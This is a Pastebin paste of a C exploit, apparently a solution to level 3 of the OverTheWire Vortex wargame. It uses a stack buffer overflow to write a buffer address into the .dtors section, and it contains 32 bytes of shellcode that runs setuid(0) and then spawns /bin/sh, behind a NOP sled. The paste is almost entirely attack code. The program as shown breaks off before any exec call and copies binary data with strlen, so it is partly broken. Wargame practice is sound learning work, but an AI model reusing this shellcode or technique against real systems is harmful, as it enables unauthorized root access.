Guest User

Untitled

a guest
Dec 14th, 2011
438
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /* Vortex wargames exploit for level 3 - http://www.overthewire.org/wargames/vortex/level03
  2. * by al3x - 2008.
  3. * Stack based buffer overflow to overwrite lpp pointer which has to be in the correct range.
  4. * if (((unsigned long) lpp & 0xffff0000) != 0x08040000)
  5. *
  6. * 28 **lpp = (unsigned long) &buf;
  7. * Writes address of buffer into dtors section by using
  8. * 08049610 l O .data00000000 p.5841
  9. */
  10.  
  11. #include <unistd.h>
  12. #include <stdio.h>
  13. #include <stdlib.h>
  14. #include <string.h>
  15.  
  16. #define NOP 0x90
  17.  
  18. /* 32 bytes setuid(0) + execve("/bin/sh",["/bin/sh",NULL]); */
  19. char shellcode[] =
  20.  
  21. "\x6a\x17" // push $0x17
  22. "\x58" // pop %eax
  23. "\x31\xdb" // xor %ebx, %ebx
  24. "\xcd\x80" // int $0x80
  25.  
  26. "\x31\xd2" // xor %edx, %edx
  27. "\x6a\x0b" // push $0xb
  28. "\x58" // pop %eax
  29. "\x52" // push %edx
  30. "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
  31. "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
  32. "\x89\xe3" // mov %esp, %ebx
  33. "\x52" // push %edx
  34. "\x53" // push %ebx
  35. "\x89\xe1" // mov %esp, %ecx
  36. "\xcd\x80"; // int $0x80
  37.  
  38. int main(int argc, char *argv[]) {
  39.  
  40.  
  41. if (argc != 2)
  42. printf("%s <vuln program>\n",argv[0]);
  43.  
  44. char addr[] = "\x10\x96\x04\x08";
  45. char nops[97];
  46. int i, len, ret;
  47.  
  48. // 32 + 97 + 4 = 133
  49. printf("sclen = %d\n", sizeof(shellcode));
  50. printf("nops = %d\n",sizeof(nops));
  51. printf("addr = %d\n",sizeof(addr));
  52.  
  53. len = sizeof(shellcode) + sizeof(nops) + sizeof(addr);
  54.  
  55. char buf[len];
  56.  
  57. memcpy(buf, shellcode,strlen(shellcode));
  58.  
  59. for (i = 0; i < sizeof(nops); i++)
  60. nops[i] = NOP;
  61.  
  62. memcpy(buf+strlen(shellcode),nops,strlen(nops));
  63.  
  64. memcpy(buf+(strlen(shellcode)+strlen(nops)),addr,strlen(addr));
  65.  
  66. char *nargv[] = {argv[1],buf, (char *)0};
  67.  
  68. }
RAW Paste Data